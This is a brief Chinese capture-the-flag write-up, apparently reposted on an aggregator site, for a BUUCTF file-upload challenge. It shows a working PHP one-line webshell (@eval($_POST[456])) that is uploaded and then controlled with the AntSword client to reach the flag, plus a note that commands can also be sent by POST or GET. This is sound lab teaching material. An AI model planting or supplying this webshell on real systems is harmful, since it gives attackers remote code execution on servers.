BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)

Posted MangataTS

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)相关的知识,希望对你有一定的参考价值。

题目链接

https://buuoj.cn/challenges#BUU%20UPLOAD%20COURSE%201

思路

我们随便传一张图片试试:

我们发现它给我们重命名了,然后我们再打开试试:


于是我们传入一个php代码试试

<?php
echo "hello world";
?>


我们发现,虽然文件重命名了,但是还是可以执行php代码,于是上传一句话木马,然后蚁剑链接即可

<?php 
@eval($_POST[456]);
?>

最后flag在网站的根目录~


注意的是,这里也可以不通过蚁剑链接,而是一句话木马然后接受shell脚本或者php代码,然后通过发送post或者get请求的方式进行搜索

以上是关于BUU UPLOAD COURSE 1 1(一句话木马+蚁剑)的主要内容,如果未能解决你的问题,请参考以下文章

Buuctf | BUU LFI COURSE 1

BUU-WEB-[ACTF2020 新生赛]Upload

BUU-WEB-[极客大挑战 2019]Upload

Buuctf | BUU SQL COURSE 1

Buuctf | BUU SQL COURSE 1

BUU SQL COURSE 1 1(SQL注入)